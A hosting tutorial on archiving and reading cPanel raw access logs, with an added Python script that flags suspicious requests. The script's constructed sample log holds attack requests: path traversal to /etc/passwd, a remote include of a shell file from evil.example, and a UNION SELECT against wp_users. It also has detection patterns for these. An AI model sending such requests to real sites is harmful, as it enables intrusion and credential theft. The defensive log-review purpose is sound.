cPanel’s raw access logs are overlooked by many, yet they give you a detailed record of who is trying to access which pages, when, and from where.
By default, cPanel discards the raw access logs after each daily statistics run, so nothing is kept. I suggest you change that setting so the logs are archived and you can review them later on a weekly or monthly basis. The archives take up some extra space on your hosting account, but that is a small price for being able to spot suspicious activity.
Reviewing the access logs will give you a good idea of which areas of your site are being accessed and how the site responded to each request. If you notice suspicious activity, you can do any of the following: double-check the affected pages, block the suspicious IP address, take an extra backup, or, if you find damage, restore the site from a previous backup. You can also contact your web hosting provider about it.
How to find Raw Access Logs:
Let’s take a look at the access logs. To reach them, click the Raw Access Logs icon on the main cPanel page:
This takes you to the Raw Access Logs screen (see image below).
Under the Configure Logs heading, tick the first checkbox (the option to archive logs in your home directory at the end of each stats run) and then click Save.
With archiving on, each day’s entries are appended to an archive file that you can download later to review activity for a period of up to a month.
The archive files are listed under the Archived Raw Logs heading at the bottom of the screen (see image below). Each file is named after the domain (grayed out in the image) with a date suffix and a .gz extension.
Click any of the archives to save it to your local disk, then extract it with WinZip, 7-Zip or similar software (or gunzip on Linux and macOS).
Raw Access Log Layout (a normal entry):
Each raw access log entry starts with the IP address of the visitor, followed by two placeholder fields (usually shown as "- -") and then the date and time of the request in square brackets. Next comes the HTTP request in quotes: "GET" means the visitor fetched a page, in this example your site’s login form (see image above). After the method you see the requested path and then the protocol version (HTTP/1.1). Note: the two requests you will see most often in the log file are GET (fetch a page) and POST (submit a form, for example a login attempt). This layout is Apache’s "combined" log format, so any tool that understands that format can read cPanel’s archives.
Next you’ll find a three-digit number, 200 in this case, which is the status code the server returned for the request. 200 (OK) is the typical value for a successful request. Two other codes you will see often are 404 (Not Found) and 403 (Forbidden). To learn more about HTTP status codes, refer to the full list on Wikipedia.
The next number, 2125, is the size in bytes of the response body the server sent back for the request (a "-" here means no body was sent).
The next part of the entry is the referrer, the URL of the page that linked to the requested one (grayed out in the image sample); "-" means the visitor typed the address directly or the browser did not send one.
Finally, the User-Agent string identifies the browser or tool the visitor used, at the end of the log row. Keep in mind that the client chooses what to send here, so it can be faked or left out; treat it as a hint, not as proof of who the visitor is.
Example of suspicious access log entries:
Here someone tried to exploit the site through a crafted URL. Such attempts usually fail because the web server’s configuration and file permissions limit what a request can reach, and a firewall running on the server should block the request as well. The status code tells you how far the attempt got: a 403 or 404 means the server refused it, while a 200 on a request like this deserves a closer look at the page involved. Either way it is good to know what is happening on your site, so you can block the IP address, and the entry is a cue to keep a closer eye on your site in general.
Another example of suspicious access log entries:
Here someone tried to exploit the site via SQL injection. You can see the "UNION" and "SELECT" database keywords in the URL; if the injection worked, they would make the database return data the visitor is not authorized to see. Attackers often URL-encode these payloads (spaces become %20, quotes become %27), so decode the request before searching for keywords. This kind of attack is prevented by the application code, which must validate input and use parameterized queries rather than pasting user input into SQL statements. WordPress core is now a lot more secure than earlier versions, but be careful with plugins and themes, which may not be written carefully enough to block this kind of attack.
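The following script is an added example, not part of the original page and not cPanel’s own code. It parses entries in the combined layout described above (IP, placeholders, timestamp, request, status, bytes, referrer, user agent) and then flags the two kinds of entries shown in the suspicious examples: crafted URLs (directory traversal and remote file inclusion through a query parameter) and SQL injection keywords, after URL-decoding the request. It also counts repeated POSTs to the login form per IP address as a simple brute-force check. The log lines embedded in it are constructed for the demonstration, with documentation-range IP addresses; the detection patterns are assumptions and not an exhaustive rule set.

```python
import re
from collections import Counter
from datetime import datetime
from urllib.parse import unquote

# One request per line in Apache "combined" format, which cPanel's raw access logs use:
#   ip ident user [timestamp] "METHOD path HTTP/x.y" status bytes "referer" "user-agent"
# Apache backslash-escapes any quote that appears inside the quoted fields.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) (?P<ident>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) (?P<size>\d+|-)'
    r'(?: "(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)")?$'
)

# Constructed sample entries (not taken from a real server); IPs are from documentation ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2020:13:55:36 +0000] "GET /wp-login.php HTTP/1.1" 200 2125 "https://example.com/" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2020:13:55:40 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "https://example.com/wp-login.php" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2020:14:02:11 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 403 199 "-" "curl/7.68.0"
198.51.100.7 - - [10/Oct/2020:14:02:15 +0000] "GET /index.php?page=http://evil.example/shell.txt HTTP/1.1" 403 199 "-" "curl/7.68.0"
198.51.100.9 - - [10/Oct/2020:14:10:01 +0000] "GET /?id=1%20UNION%20SELECT%20user_login,user_pass%20FROM%20wp_users-- HTTP/1.1" 200 5120 "-" "sqlmap/1.4"
192.0.2.30 - - [10/Oct/2020:14:20:00 +0000] "GET /about/ HTTP/1.1" 200 8342 "https://www.google.com/" "Mozilla/5.0"
"""

# Hypothetical detection rules, applied to the URL-decoded path and query string.
SUSPICIOUS = [
    ("sql_injection", re.compile(r"\bunion\b.+\bselect\b|\bor\b\s+1\s*=\s*1", re.I)),
    ("path_traversal", re.compile(r"\.\./|\.\.\\")),
    ("remote_include", re.compile(r"[?&][^=&]+=(?:https?|ftp)://", re.I)),
]


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = COMBINED_RE.match(line.strip())
    if m is None:
        return None
    e = m.groupdict()
    # "GET /path?query HTTP/1.1" -> method, path (with query string), protocol version
    parts = e["request"].split(" ")
    e["method"] = parts[0]
    e["path"] = parts[1] if len(parts) > 1 else ""
    e["protocol"] = parts[2] if len(parts) > 2 else ""
    e["status"] = int(e["status"])
    e["size"] = 0 if e["size"] == "-" else int(e["size"])  # "-" means no body was sent
    e["time"] = datetime.strptime(e["time"], "%d/%b/%Y:%H:%M:%S %z")
    return e


def classify(entry):
    """Return the names of the rules the entry's decoded URL matches (empty list if none)."""
    # Decode twice so double-encoded payloads (e.g. %2527 for a quote) are caught too.
    decoded = unquote(unquote(entry["path"]))
    return [name for name, pattern in SUSPICIOUS if pattern.search(decoded)]


def analyze(log_text, login_threshold=5):
    """Scan a whole log; report flagged requests and IPs hammering the login form."""
    flagged = []
    login_posts = Counter()
    for line in log_text.splitlines():
        e = parse_line(line)
        if e is None:
            continue  # not a combined-format line; skip rather than crash
        tags = classify(e)
        if tags:
            flagged.append((e["ip"], e["path"], e["status"], tags))
        if e["method"] == "POST" and e["path"].startswith("/wp-login.php"):
            login_posts[e["ip"]] += 1
    brute_force = [ip for ip, n in login_posts.items() if n >= login_threshold]
    return {"flagged": flagged, "brute_force": brute_force}


if __name__ == "__main__":
    report = analyze(SAMPLE_LOG)
    for ip, path, status, tags in report["flagged"]:
        # A 200 next to an attack pattern deserves a closer look than a 403/404.
        print(f"{ip} {status} {','.join(tags)} {path}")
    for ip in report["brute_force"]:
        print(f"possible login brute force from {ip}")
```

To use it on a real archive, extract the .gz file and pass the file contents to analyze(); the status column in the output tells you whether the server refused the request (403/404) or served it (200), which is the first thing to check before deciding whether to block the address or dig deeper.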